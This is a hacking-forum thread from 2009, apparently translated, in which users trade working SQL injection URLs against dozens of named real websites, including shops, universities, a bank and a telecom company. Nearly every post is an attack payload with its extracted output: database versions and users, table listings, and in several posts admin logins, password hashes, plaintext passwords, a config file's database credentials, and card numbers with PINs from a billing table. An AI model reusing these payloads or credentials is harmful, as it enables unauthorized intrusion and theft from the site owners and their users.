View full version: SQL Injections
http://www.itscoldoutside.com/
http://www.itscoldoutside.com/news.asp?id=1+or+1=(select+top+1+id+from+dtpropert ies)--
version: Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
db_name: ICONews
system_user: Clive
here is what I managed to extract:
table_name column_name
VW_test
dtproperties 'id' 'objectid' 'property' 'value' 'uvalue' 'lvalue' 'version'
NewsArticles
sysconstraints 'constid' 'id' 'colid' 'spare1' 'status' 'actions' 'error'
syssegments 'segment' 'name' 'status'
t_jiaozhu 'jiaozhu'
tbl_news
vw_bcpMasterSysobjects 'tag' 'parent' 'Article!1!ID' 'Article!1!BradftonID' 'Article!1! Heading' 'Article!1! DateFeed'
vw_googlenews
VW_rss
VW_top
VW_xml
p.s. first time :rolleyes:
BlackPanther
25.04.2009, 15:20
Site: (sibmedia.ru) News portal.
SQL:
http://sibmedia.ru/index.php?id=-10220+union+select+CONCAT_WS(CHAR(32,58,32%20%20), user(),database(),%20version()),null,2--
See the result at the top.
Tables:
mailbrush
25.04.2009, 15:59
http://www.ckat.ru/keywords/answer.php?id=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion())/*
Uwww63S@localhost:udb63:4.1.21-log
http://www.venereology.ru/faq/answer.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9
mgido@localhost:mgido:5.0. 45
http://www.infomedical.ru/faq/answer.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9
infomedical@localhost:info medical:5.0.45
M.W.N.N.
25.04.2009, 19:47
http://www.beadstreet.com.au/listproducts.php?id=47+union+select+concat_ws(0x3a ,version(),database(),user())+limit+1,1
version():4.1.20
database():beadstreet
user():beadstre@localhost
__
http://www.bpsca.co.uk/products.php?id=147+union+select+1,concat_ws(0x3a, version(),database(),user()),3,4,5,6,7,8,9,10,11+l imit+1,1/*
version():4.1.22-standard:
database():bpsca_data
user():bpsca_website@localhost
__
http://www.etver.ru/1forum/viewmessage.php?sid=1&id=29140+union+select+1,2,3,concat_ws(0x3a,version (),database(),user()),5,6,7,8,9
version():5.0.77-log
database():etver
user():etver@localhost
DezMond™
26.04.2009, 12:21
http://vikings.vcsu.edu/php/details.php?id=-563'+union+select+1,2,table_name,4,table_name,6,7, 8,9,10,11,12,13,14,15+from+information_schema.tabl es+limit+879,1000+--+
All tables are locked((
cinema.perm.ru
http://cinema.perm.ru/events/?id=-67+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6--
version():4.0.24_Debian-10sarge2-log
database():dbcinema
user():cinema@localhost
<<RUNAWAYBOX>>
http://www.runawaybox.com/video.php?vid=-396+union+select+1,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9--+
http://www.runawaybox.com/admin/
5.0.45:runawaybox:runawaybox@localhost:portbld-freebsd6.2
-=admin=-
log: runawaybox
pass: $1$0lRFi.9p$5vaDEIDcwC/b/aQu/H1.g1 ):
online game
http://info.wotgame.ru
thx for Saint
mssql-inj in the login field, result in the URL
Tables:
wqe' or 1=(select top 1 TABLE_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME NOT IN('UserRecords','Objects','InheritanceMapping','U serRecordParts','CharacterRecordParts','TypesMappi ng','CharacterRecords','UserRecordsToUserRecordPar ts','UserRecordsToCharacterRecords','CharacterReco rdsToCharacterRecordParts','JabberUserRecords','WO TCharacterRecordStubs'))--
================================================== ==================================
http://www.585.ru/index.php?main=11&sess=12103026&model=3446+and+substring(@@version,1,1)=4
version():4 ;(
================================================== ==================================
http://eromagazin.ru/info/?id=-6300+union+select+1,2,3,4,5,6,7,8,9,table_name,11, 12,13+from+information_schema.tables--
concat_ws(0x3a,version(),user(),database()):5.0.67-log:u30200@10.10.153.166:u30200
DezMond™
26.04.2009, 16:31
http://www.jc.edu/calendar/details.php?id=-4265+union+select+1,2,3,4,5,6,7,TABLE_NAME,9,10,11 +from+information_schema.tables/*
http://www.raznosvet.com/do/notice.php?id=-7590+union+select+concat_ws(0x3a,version(),databas e(),user()),2,3,4,5,6,7,8,9,10--
version: 4.0.27-max-log
database: razno
user: razno@208.109.138.83
I also hacked a travel agency site (mssql), won't post it for now :)
www.petpsych.com
http://www.petpsych.com/article_detail.php?id=-1+union+select+1,2,3,4,5,6--
version():5.0.67-community
database():petpsych_main
user():petpsych_petpsyc@localhost
<<msong.com.ru>>
http://msong.com.ru/play.php?id=-680'+union+select+1,concat_ws(0x3a3a3a,table_name, table_schema),3,4,5,6,7,8,9+from+information_schem a.tables--+
5.0.22:::admin_song1:::admin_song1@localhost:::red hat-linux-gnu - 3
tables where columns: password
http://msong.com.ru/play.php?id=-680'+union+select+1,concat_ws(0x3a3a3a,table_name, table_schema),3,4,5,6,7,8,9+from+information_schem a.columns+where+column_name+like+'password'+limit+ 3,1--+
AngelOfFaith
26.04.2009, 20:38
http://wap.jamango.ru/mangotop/index.php?action=top100&cat=-4+union+select+1,2,3,4,concat_ws(0x3a,url,email,pa ssword)+from+top_users/*
HAXTA4OK
26.04.2009, 23:13
let's keep breaking WAP sites ;)
http://wap.likenet.ru/wap2/showsms.php?id=1+union+select+1,2,3,concat(version (),0x3a, user(),0x3a,database())/*
5.0.45-community-nt:likenetru@localhost:likenet
take accounts from the users table
http://wap.likenet.ru/wap2/showsms.php?id=1+union+select+1,2,3,concat(login,0 x3a,password,0x3a,email)+from+ users/*
M.W.N.N.
27.04.2009, 01:28
http://www.zbulvar.ru/wap/newz.php?newsid=21498+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33+limit+1,1/*
version():5.0.32-Debian_7etch8-log
database():zbulvar_pm
user():zbulvar_pm@localhost
http://www.roymagazine.it/time/display.php?ID=179/**/UNION/**/SELECT/**/password,userid+from+user/*
Database name: Sql33637_1
User name: Sql33637@62.149.130.154
Database Version: 4.0.30-standard-log
http://www.envapack.com/b2b/buyoffers.php?cid=-3+union+select+1,table_name,3,4,5,6,7,8+from+infor mation_schema.tables+limit+70,1#
5.0.67-community
envapack_b2b
envapack_root@localhost
tables
winstrool
27.04.2009, 13:39
_http://egenius.ru/seminar/arc.php?cid=-4+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9+--
version:user:database
5.0.67-log:u96975@10.10.153.177:u96975_eg
HAXTA4OK
27.04.2009, 13:47
<<little dolphins>>
http://www.ptpi-dolphins.org/index.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7--
plbginf_ptpi@localhost:plbginf_ptpi:5.0.67-community
M.W.N.N.
27.04.2009, 14:46
http://wap.novonews.lv/index.php?mode=news&id=72419%27+union+select+1,2,3,4,5,6,7,8,9,10,conc at_ws(0x3a,version(),database(),user()),12,13,14,1 5+limit+1,1/*
version():5.0.22-log
database():novonews_v2
user():novonews_v2_adm@192.168.1.1
HAXTA4OK
27.04.2009, 14:57
WAP sites again http://wap.geoline.ge/wap1.php?pg=gmlist&id=-358+union+select+concat_ws(0x3a,version(),database (),user()), 2
5.0.33-log:mobicont:webserver@localhost
winstrool
27.04.2009, 15:30
_http://www.sportshop.com.ua/catalogue.php?CID=-27+union+select+1,2,3,concat_ws(version(),user(),d atabase()),5,6,7,8--
version():4.1.22-standard
database():babymark_im
user():babymark_akhar@localhost
www.vetlek.ru
http://www.vetlek.ru/articles/?id=-1+union+select+1,2,3,concat(0x3a,version(),databas e(),user()),5,6,7,8--
version():5.0.67-log
database():u66995
user():u66995@10.10.10.218
HAXTA4OK
27.04.2009, 15:54
some software sites
softobzor.com.ua
TIC: 30
PR: 3
http://softobzor.com.ua/stat_info.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),us er()),3,4/*
version():4.1.25
database():softobzor
user():softobzor_user@localhost
HAXTA4OK
27.04.2009, 16:14
oh, some kind of little elephant
http://loznitsa.ru/object.php?id=-1+union+sel ect+concat_ws(0x3a,version(),database(),user())--
TIC: 10
PR: 1
5.0.30-Debian_1-log:loznitsa_baze:loznitsa_baze@77.221.130.2
mailbrush
27.04.2009, 16:37
http://www.othmar-karas.at/ok.php?ok=new_presse_zeigen.php&id=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,user() ,database(),version()))),4,5,6,7,8,9
web1@localhost :web1:4.1.13
DezMond™
27.04.2009, 16:46
PR 5
http://events.plu.edu/events.php?mode=&date=&subject=-65+union+select+LOAD_FILE(0x2F7777772F6576656E7473 2F696E636C756465732F636F6E6669672E706870),2,versio n()+from+mysql.user/*
/*define("MYSQL_SERVER", "localhost");
define("MYSQL_USERNAME", "webdev");
define("MYSQL_PASSWORD", "taiWORC48");*/
define("MYSQL_DB", "events_calendar");
whoever digs further, drop me a PM (although it looks like admin panel login there is allowed by IP)
<<Club "Shatura" - Official site>>
http://www.schkura.ru/vid/index.php?download=-8+union+selecT+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),user(),@@version_compile_os),8,9,0,1--+
4.1.22-standard-log:schkura_mus:schkura@localhost:unknown-linux-gnu
HAXTA4OK
27.04.2009, 17:19
http://www.biker.dn.ua/notes/notes_view.php?id=-1+union+select+1,2,3,4, version()/*
TIC: 20
PR: 3
version():4.0.21-log
database():biker_dn_u
user():biker_dn_u
blind sql-inj
http://mqup.mcgill.ca/content.php?id=4+and+substring(@@version,1,1)=5
http://www.sttheresasugarland.org/content.php?id=13+and+substring(@@version,1,1)=5
http://www.ufs.ac.za/faculties/content.php?id=6355+and+substring(@@version,1,1)=5
http://www.nigfilmcorp.com/content.php?id=-7+union+select+1,2,concat_ws(0x3a3a,version(),data base(),user()),4,5--
4.1.22-max-log::nfcadmin::nfcadmin@64.202.163.150
http://www.rupedia.ru/showarticle.php?article=-12607+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a, version(),database(),user()),10,11,12/*
version: 4.1.22-log
database: wwwrupediaru_articles
user: webmas02_artic01@fe46.hc.ru
HAXTA4OK
27.04.2009, 18:32
don't know if it's interesting or not, but there's something about money there))
TIC: 10
PR: 3
http://komu.com.ua/index.php?Lev=b3&Id=-1'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),database() ,user())+--+
5.0.77:komu_com_ua:komu.com.ua@localhost
http://komu.com.ua/index.php?Lev=b3&Id=-1'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,pas s,email)+from+users +--+
admin
95a9ac6:admin@komu.com.ua
6275 accounts in total
www.gmsn.ru
http://www.gmsn.ru/pic.php?id=-710%27+union+select+1,2,3,4,5/*
Database Version: 4.1.16-1.gms
Database name: w_gmsn
User name: w_gmsn@195.42.160.19
1600 TIC
M.W.N.N.
27.04.2009, 19:19
http://www.viva-telecom.ru/SHOP/fullimage.php?id=2691&idfull=1955%27+union+select+1,concat_ws(0x3a,versi on(),database(),user()),3,4,5+limit+1,1/*
version():5.0.45
database():wwwvivatelecomru
user():vivatele@localhost
HAXTA4OK
27.04.2009, 19:42
http://www.flatsminsk.com/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x3a,version(),database(),user()), 13--
5.0.67-community-log:flats_main:flats_main@localhost
TIC: 60
PR: 3
mailbrush
27.04.2009, 20:01
http://www.coolhandfish.com/fish.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20
dbo166573204@74.208.16.166:db166573204:4.0. 27-stan
DezMond™
27.04.2009, 20:11
A bunch of shops))
http://www.expo-shop.ru/show_cat.php?grid=1&catid=2'+union+select+1,2,3,concat(password),5,6,7 ,8,9,10+from+admin/*
admin:4e5306301f075d39
http://www.sanmag.ru/show_cat2.php?grid=10'+union+select+1,2,3,4,5,6,7, 8/*
http://elitmatras.ru/show_cat.php?catid=212'+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19/*&grid=1
http://office-r.ru/show_cat.php?catid=92'+union+select+1,2,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17/*&grid=22
http://svet-svetoch.ru/show_cat3.php?catid=59&grid=7&idcateg=141'+union+select+1,2,3,4,5,6,7,8,9,10,11, 12/*
http://www.inetstyle.ru/show_cat2.php?grid=2'+union+select+1,2,3,concat(us ername,char(58),password),5,6,7,8,9,10+from+admin/*&catid=1&cen=&order=name&page=1
admin:telegrad
http://www.imperia-sna.ru/show_cat2.php?grid=702'+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18/*--
http://planetasnov.ru/show_cat.php?catid=5038'+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18/*&grid=5037
http://wedmarket.ru/show_cat2.php?grid=70000'++union+select+1,2,3,vers ion(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+admi n/*
http://www.interiorportal.ru/show_cat2.php?grid=-16000000'+union+select+1,2,3,concat(username,char( 28),password),5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23+from+admin+--+
admin:lelybr2009
http://www.elektro-inst.ru/show_cat2.php?grid=500018'+union+select+1,2,3,vers ion(),5,6,7,8,9,10,11,12,13,14,15,16,17/*
http://www.deja-interier.ru/show_cat.php?catid=5115'+union+select+1,2,3,versio n(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*&grid=5113
http://latomir.ru/show_cat2.php?grid=1001'+union+select+1,2,3,versio n(),5,6,7,8,9,10,11,12,13,14,15,16,17/*
http://www.zerogravity.ru/show_cat2.php?grid=1029000'++union+select+1,2,3,ve rsion(),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
http://gallerysilk.ru/show_cat2.php?grid=1000'+union+select+1,2,3,versio n(),5,6,7,8,9,10,11,12,13,14,15,16,17+from+admin/*
http://superteks.ru/show_cat2.php?order=name&grid=20000'+order+by+19/*
http://www.1000sumok.ru/show_cat2.php?grid=5058'+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17/*
http://www.portlandtx.com/news_archives.cfm?Id=-208+union+select+1,2,3,4,concat_ws(0x3a3a,username ,password),6,7,8+from+users/*
ccdastrophotography.com pr 4
http://ccdastrophotography.com/object.php?id=-13%20union%20select%201,2,3,concat_ws(0x3a3a,datab ase(),user(),version()),5,6,7,8,9,0,1,2,3
ccd::ccd@localhost::5.0.51a-3ubuntu5.4
HAXTA4OK
27.04.2009, 20:45
http://www.elfarus.ru/index.php?action=pages&id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()), 4--
5.0.77:elfarus_el:elfarus_el@localhost
TIC: 30
PR: 4
http://www.helsinki.ua/project.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(), user())/*
5.0.44-log:helsinki_helsinki:alefvinal@localhost
TIC: 10
PR: 3
mailbrush
27.04.2009, 21:05
http://www.4thirds.co.uk/fish.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13+--+
reesy_reesy77@localhost:reesy_gallery:4.1.22-standard
http://www.mercerbar.com/philanthropy.php?pid=2+UNION+SELECT+concat_ws(0x3a ,user(),version(),database())+LIMIT+1,1/*
mercer_mercerbar@localhost:4.1.22-log:mercer_mercerbar_db
ILYAtirtir
28.04.2009, 01:48
SravniSam.ru - the first services supermarket on the Runet.
http://www.sravnisam.ru/?go=items&id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,c oncat_ws(0x3a,database(),user(),version()),14,15
base_general:saddamhoosaine@localhost:5.1.32-log
http://www.sravnisam.ru/?go=items&id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,t able_name,14,15+from+information_schema.tables+lim it+x,1
the ones I liked
sms_admin_users
ss_users
tbl_admin_users
tbl_users
http://www.sravnisam.ru/?go=items&id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,c olumn_name,14,15+from+information_schema.columns+w here+table_name=0x736D735F61646D696E5F7573657273+l imit+x,1
login
password
http://www.sravnisam.ru/?go=items&id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,c oncat_ws(0x3a,login,password),14,15+from+sms_admin _users+limit+x,1
etc.
http://www.sravnisam.ru/?go=items&id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,c olumn_name,14,15+from+information_schema.columns+w here+table_name=0x73735F7573657273+limit+x,1
users_login
users_password
users_nick
http://www.sravnisam.ru/?go=items&id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,c oncat_ws(0x3a,users_login,users_nick,users_passwor d),14,15+from+ss_users+limit+x,1
http://www.sravnisam.ru/?go=items&id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,c olumn_name,14,15+from+information_schema.columns+w here+table_name=0x74626C5F61646D696E5F7573657273+l imit+x,1
login
password
http://www.sravnisam.ru/?go=items&id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,c oncat_ws(0x3a,login,password),14,15+from+tbl_admin _users+limit+x,1
http://www.sravnisam.ru/?go=items&id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,c olumn_name,14,15+from+information_schema.columns+w here+table_name=0x74626C5F7573657273+limit+x,1
user
pass
http://www.sravnisam.ru/?go=items&id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,c oncat_ws(0x3a,user,pass),14,15+from+tbl_users+limi t+x,1
winstrool
28.04.2009, 13:14
here are a couple more SQLi))
_http://friendsoftheirishenvironment.net/friendswork/index.php?action=cat&cid=-7+union+select+1,2,3,4,concat_ws(0x3b,version(),us er(),database()),6,7,8,9+--
version/user/database
4.1.22-standard;fienet_fie@localhost;fienet_fie
_http://www.poseidon.hcmr.gr/article_view.php?id=-124+union+select+1,2,3,4,5,6,9,8,concat_ws(0x3b,ve rsion(),user(),database()),0,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,42,41,43,44,45,46,47,48,49,50,5 2,53,52,54+--&cid=28&bc=28
version/user/database
5.0.45;www_poseidon@iris5004.ath.hcmr.gr;project_p oseidon
_http://bclibrary.ca/ell/links.php?subid=-191+union+select+1,2,3,4,concat_ws(0x3b,version(), user(),database()),6,7,8+--&cid=4'=
version/user/database
5.0.24-plsb-log;ell_web@localhost;ell
_http://www.tneb.in/template_3.php?tempno=3&cid=0&subcid=-181+union+select+concat_ws(0x3b,version(),user(),d atabase())+--
version/user/database
5.0.41-log;tnebin@localhost;tnebin_eb
_http://russian-invest.ru/index.php?do=catop&cid=-69+union+select+1,2,3,4,concat_ws(0x3b,version(),u ser(),database())
version/user/database
5.0.32-Debian_7etch6-log;russia@localhost;russia_fin
mailbrush
28.04.2009, 14:44
http://zwerg-schnauzer.info/dog.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat_ws(0x3a,user(),database(),version()),16,17,18
rustrake_mini@localhost:rustrake_mini:5.0.26-lk-log
http://sarilocker.com/advice/qa.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6
sarilock_01@localhost:sarilock_0 1:5.0.75-community-log
http://armor.kiev.ua/php/news.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9
armor@localhost:armor:5.0. 77
.:[melkiy]:.
28.04.2009, 20:39
Collection of music sites
http://catmusic.org/info/?id=-1230+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
Database Version: 4.1.20
Database name: infor490_5
User name: infor490_5@localhost
Pity the DB is version 4 :(
http://www.fcmetalurg.com/season/about_team.php?tid=-5+union+select+version(),2,3,4/*
www.directionsmedia.net
http://www.directionsmedia.net/newsletters.archive/index.php?ID=-142+union+select+1,2,3,4--
version()4.1.22-log
database()DirMain
user()sa@localhost
blind sql-inj
http://www.endven.com/index/news.php?id=20+and+substring(@@version,1,1)=5
http://www.ogf.org/News/news.php?id=129+and+substring(@@version,1,1)=4
----------------------------------------------
AkyHa_MaTaTa
28.04.2009, 22:16
www.gmsn.ru - TIC 1200 Pr - 6
http://www.gmsn.ru/page.php?rub=news&id=-1'+union+select+1,2,unhex(hex(concat_ws(0x3A,user( ),@@version,database()))),4,5,6,7,8--+
w_gmsn@195.42.160.19:4.1.16-1.gms:w_gmsn
ph1l1ster
28.04.2009, 22:53
filetransit.com
TIC: 90
PR: 6
http://www.filetransit.com/category.php?id=192+AND+ascii(lower(substring((SEL ECT+concat(name,0x3a,password)+from+user+LIMIT+1), 1,1)))>1
ascii:32,97,108,101,120,58,116,114,97,110,53,33,11 6
char: alex:tran5!t
http://www.filetransit.com/admin/
HAXTA4OK
28.04.2009, 23:35
restaurant-divan))
http://www.restoran-divan.ru/menu.php?id=-1+union+select+concat_ws(0x3a,version(),database() , user())--
4.1.22-log:www7masterovru_divan:x7mastero_divan@fe35.hc.r u
TIC: 100
PR: 0
http://www.r-divers.ru/yacht.php?id=-1'+union+select+1,concat_ws(0x3a,version(),databas e(), user()),3,4/*
4.1.22:rdivers_rdivers:rdivers_rdivers@localhost
TIC: 0
PR: 3
ILYAtirtir
29.04.2009, 08:59
MKBUnionBank
http://www.unionbank.bg/index.php?p=services2_4_3'+and+substring(version() ,1,1)=5/*&language=bg
5th branch
user() = root
database() = unionbank
Closed joint-stock company ROSSPETSSTAL
http://www.rosspecstall.ru/index.php?page=products&tid=-100009+union+select+1,concat_ws(0x3a,database(),us er(),version())
rosspecstall:rosspecstall@berns.mplik.ru:5.0.41-log
http://www.rosspecstall.ru/index.php?page=products&tid=-100009+union+select+1,concat_ws(0x3a,login,passwor d)+from+stal_admin
admin:5f4dcc3b5aa765d61d8327deb882cf99
admin panel: http://www.rosspecstall.ru/admin.php
winstrool
29.04.2009, 09:39
TIC 180
PR 0
_http://www.stebenev.com/index.php?cid=2+union+select+concat_ws(0x3b,versio n(),user(),database()),2,3,4,5,6,7,8,9,0,1,2,3,4,5 +--
version/user/database
5.0.67;u13249@78.108.81.11;b13249
http://stebenev.com/admin/
admin;2ee8f38b6616f2ad28cf84f19e8f9ffa
Here is what the table returned for the query
_http://www.stebenev.com/index.php?cid=2+union+select+table_name,2,3,4,5,6, 7,8,9,0,1,2,3,4,5+from+information_schema.tables--
HAXTA4OK
29.04.2009, 14:38
http://www.roxter.com.ua/publication.php?id=-1+union+select+1,2,concat_ws(0x3b,version(),user() , database()),4,5,6--
5.0.51a-log;bzbunsky@localhost;roxter
TIC: 10
PR: 4
http://www.natec-color.ru/prod.php?id=-1+union+select+1,2,concat_ws(0x3b,version(),user() , database()),4,5,6--
5.0.67-log;u7799@10.10.223.235;u7799_2
TIC: 30
PR: 0
http://www.meridian.kr.ua/country.php?id=-1+union+select+1,concat_ws(0x3a,version(), user(),database()),3,4,5,6--
4.1.22-log:meridian_admin@goliaph:meridian_mybase
TIC: 10
PR: 1
http://www.apstyle.ru/articles/index.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(), user(),database()),5,6--
4.0.24:apstyle@localhost:apstyle
TIC: 20
PR: 3
winstrool
29.04.2009, 16:01
_http://commercials.tuneforums.com/thread_view.php?threadID=-4037+union+select+1,2,3,4,concat_ws(0x3b,version() ,user(),database()),6,7,8,9,0,1,2
version/user/database
4.0.27-max-log;dbo112672968@74.208.16.34;db112672968
http://commercials.tuneforums.com/login.php
emilengelman@hotmail.com;MARIE532
HAXTA4OK
29.04.2009, 16:26
http://www.lacart.ru/collectionsall.php?id=-1+union+select+concat_ws(0x3a,version(),user(), database()),2,3,4,5--
4.0.26:lacart@box.hc.ru:wwwlacartru
TIC: 30
PR: 4
<<PORTABLE WORLD>>
http://www.portmir.ru/info.php?id=-1420259+union+select+concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7--+
4.1.22-log:wwwportmirru2:portmir@localhost:portbld-freebsd6.2
http://www.portmir.ru/adm/
Target: www.sundance.dk
Evil link: http://www.sundance.dk/news.php?id=-40'+union+select+1,2,3,concat_ws(0x203a20,version( ),database(),user(),@@version_compile_os)--+
Info:
Database Version: 5.0.51a-24-log
Database name: sundance
User name: sundance@84-246-245-157.unalloc.logiqit.net
OS: debian-linux-gnu
Users:
HAXTA4OK
29.04.2009, 23:28
http://www.stfootball.com/club/club_list.php?id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase()),2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32--
5.0.76-standard-log:planetfootball@localhost:stfoot_belarus
-m0rgan-
29.04.2009, 23:37
http://www.kulturkoppra.se/istid/page.php?id=-1+union+all+select+0,1,2,3,4,concat_ws(0x3a,id,pas swd)+from+passwd--
id/password:
1:4IdIn367
ILYAtirtir
30.04.2009, 05:17
OAO "Transtelecom"
http://www.cc.transtelecom.ru/TariffListPub.asp?fieldAreaKey=INTL'+union+select+ @@version--&Sort=1
Microsoft SQL Server 2000 - 8.00.534 (Intel X86) Nov 19 2001 13:23:50 Copyright (c) 1988-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
http://www.cc.transtelecom.ru/TariffListPub.asp?fieldAreaKey=INTL'+union+select+ db_name()--&Sort=1
BillSystem
http://www.cc.transtelecom.ru/TariffListPub.asp?fieldAreaKey=INTL'+union+select+ system_user--&Sort=1
CC_Client
all tables
http://www.cc.transtelecom.ru/TariffListPub.asp?fieldAreaKey=INTL'+union+select+ TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TA BLE_NAME+NOT+IN+('BS_ACCOUNTS','BS_ADV_REPORT_TASK ','BS_ADV_REPORT_TASK_SCHEDULE','BS_ANI_INFO','BS_ AUDIT','BS_CDRLOG','BS_CURRENCIES','BS_CURRENCY_RA TES','BS_DIAL_AREAS','BS_DIAL_CODE_INTERZONE','BS_ DIAL_CODES','BS_DIAL_CODES_save','BS_DIAL_PREFIXES ','BS_DIAL_ZONES','BS_DNIS','BS_DNIS_USER_GROUP_MA P','BS_GRANTS','BS_GROUPS','BS_HOLIDAYS','BS_PHONE _BOOK','BS_PHONE_GROUP_MAP','BS_PHONE_GROUPS','BS_ PHONES','BS_SERVICE_UNITS','BS_SERVICES','BS_TARIF F_CONDITIONS','BS_TARIFF_PLAN_MAP','BS_TARIFF_PLAN S','BS_TARIFFS','BS_TASK_QUEUE','BS_TRANSACTIONS', 'BS_USER_GROUP_MAP','BS_USER_GROUPS','BS_USER_PHON E_GROUP_MAP','BS_USERS','BS_W_METRO','BS_W_METRO_L INE','BS_W_METRO_POINT','BS_W_POINT_GROUP','BS_W_S ALE_POINT','BS_WEEKEND_EXCEPTIONS','BS_ZONE_MAP',' dtproperties','sysconstraints','syssegments','view _cdr_by_distance_key','VIEW1','VIEW2')--&Sort=1
and, for example, a card number and password
http://www.cc.transtelecom.ru/TariffListPub.asp?fieldAreaKey=INTL'+union+select+ cast(F_NAME+as+nvarchar)%2B%27%3A%27%2Bcast(F_PAN+ as+nvarchar)%2B%27%3A%27%2Bcast(F_PASSWORD+as+nvar char)+FROM+BS_USERS--&Sort=1
№ 8536****:85366849:849652
Iceangel_
30.04.2009, 10:04
edu, PR=7
http://www.rit.edu/news/?c=student'+and+1=2+union+select+1,2,3,4,5,version (),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
Database Version: 5.0.77
Database name: w_news
User name: w-news@web01www01c.rit.edu
HAXTA4OK
30.04.2009, 14:27
Website of the student scientific society of the Belarusian State Medical University
http://snobsmu.com/news.php?id=1&tab=vnbol§or_id=-9+union+select+concat_ws(0x3a,version(),user(), database())--
5.0.67-community:snobsmu_boss@localhost:snobsmu_main
<<SITC.ru: High-tech news>>
http://www.sitc.ru/index.php?id=99999999999999'+union+select+1,concat _ws(0x3a,version(),database(),user(),@@version_com pile_os),3,4,5,6,7,8,9,0,1,2,3--+
4.0.26-log:sitc:sitc@localhost:portbld-freebsd5.2.1
Target: www.fashionguide.dk
Evil link: http://www.fashionguide.dk/international/news/news.php?id=871+union+select+concat_ws(0x203a20,ve rsion(),database(),user(),@@version_compile_os)--+
Info:
version: 5.0.67
database: look4fashion_dk_db
user: look4fashion@localhost
OS: redhat-linux-gnu
Admin:
bdm:ef19cf2f9c2faeb520542022e35f1cfe (pass: hestesko)
erihtoney
30.04.2009, 15:50
Georgian Economic Academy (Tbilisi)
http://www.ael.ge/geo/viewsyllabus.php?id=-1+union+select+1,2,3,concat_ws(0x203a20,user(),
version(),database()),5,6
user: ael_edu_ge@localhost
version: 4.0.27
database: ael_edu_ge
_____________________________
Georgian programmers' forum
http://portal.soft.ge/main.php?section_id=3&
script_id=2&
file_id=-1+union+select+1,,3,4,5,6,7,8,9,10,11,12,13,14,15, 16/*
_____________________________
http://www.mersinozelidare.gov.tr/sayfa_icerik.php?yol=0_3+union+select+1,2,3,4
,5,6,7,8,9,10/*
_____________________________
http://www.podvesnoi.ru/catalog.php?group=-2+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6--
version: 4.1.22-log
database: wwwpodvesnoiru_podvesnoi
user: podvesno@localhos
____________
http://www.7sun.ru/index.php?action=catalog&act=view&id=-53+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6,7,8--
version: 5.0.51
database: s7sun
user: s7sun@localhost
____________
http://www.tehnikavdom.ru/ishop.php?s=catalog&id=-46+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7--
